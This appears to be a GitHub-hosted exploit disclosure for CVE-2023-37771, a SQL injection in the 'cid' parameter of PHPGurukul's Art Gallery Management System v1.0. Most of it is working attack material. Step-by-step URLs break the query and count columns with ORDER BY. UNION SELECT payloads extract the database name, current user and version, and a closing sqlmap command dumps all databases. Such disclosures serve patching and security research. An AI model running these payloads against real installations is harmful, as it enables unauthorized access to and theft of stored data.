-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE
30 lines (21 loc) · 1.35 KB
/
CVE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Exploit Title:Art Gallery Management System v1.0 - SQL Injection
Vendor of Product - https://phpgurukul.com/
Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/
Tested on: Linux
Attack Type - Local
Steps Of Reproduce -
1. Go to the Sculptures by navigating the "ART TYPE" option in the navigation bar.
http://127.0.0.1/agms/product.php?cid=1&&artname=Sculptures
2. Here on this page in "cid" parameter by inserting single quotes to break the query we know that the "cid" parameter is vulnerable to SQL injection.
http://127.0.0.1/agms/product.php?cid=1'&&artname=Sculptures
3. Now join query
http://127.0.0.1/agms/product.php?cid=1'--+&&artname=Sculptures
3. Now run "order by " query to know the columns
127.0.0.1/agms/product.php?cid=1' order by 6 --+&&artname=Sculptures
4.Now By inserting the payload in the "cid" parameter we got the username, database, and database version.
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,database(),5,6 --+&&artname=Sculptures
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,current_user(),5,6 --+&&artname=Sculptures
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,version(),5,6 --+&&artname=Sculptures
5. Now dump all the database by using sqlmap:
sqlmap -u http://127.0.0.1/agms/product.php?cid=1 --dump-all --batch
*Reference: CVE-2023-37771.